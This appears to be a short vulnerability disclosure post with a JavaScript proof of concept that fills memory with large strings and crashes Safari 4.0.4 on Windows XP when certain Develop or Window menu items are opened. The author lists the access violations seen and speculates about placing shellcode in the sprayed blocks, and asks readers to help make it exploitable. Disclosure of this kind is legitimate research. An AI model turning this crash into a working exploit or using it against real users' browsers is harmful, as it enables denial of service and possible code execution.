The following piece of JavaScript will crash Safari nicely when triggered using one of the methods described below. With my limited knowledge I am unable to tell if it's exploitable or not. I therefore turn it over to "the internet". (tested on Safari 4.0.4, Win XP Pro SP3)
============================
<script>
// Build a string of 0x40000 "A" (0x41) bytes by repeated doubling.
var data = "A";
while (data.length < 0x40000) {
    data += data;
}
// Fill an array with 4000 strings of twice that length; the crash itself
// only appears later, when one of the Safari menu actions below is used.
var data2 = new Array();
for (var x = 0; x < 4000; x++) {
    data2[x] = data + data;
}
</script>
============================
The crash is not immediate, but there are actually two ways to trigger it and I believe they are separate problems.
The following will cause Safari to crash with “Access violation reading [00000000]”.
* Window->Activity
Whereas these will crash Safari with “Access violation writing to [BBADBEEF]”:
* Develop->Start Debugging Javascript
* Develop->Show Error Console (Unreliable)
* Develop->Show Web Inspector (Unreliable)
* (Right Click)->Inspect Element
I can’t seem to affect any registers in an advantageous way, but I do see several pointers to \x41 blocks on the stack. At least you could put shellcode in these and jump to them if you could control EIP. If anyone is able to do anything with this, please let me know.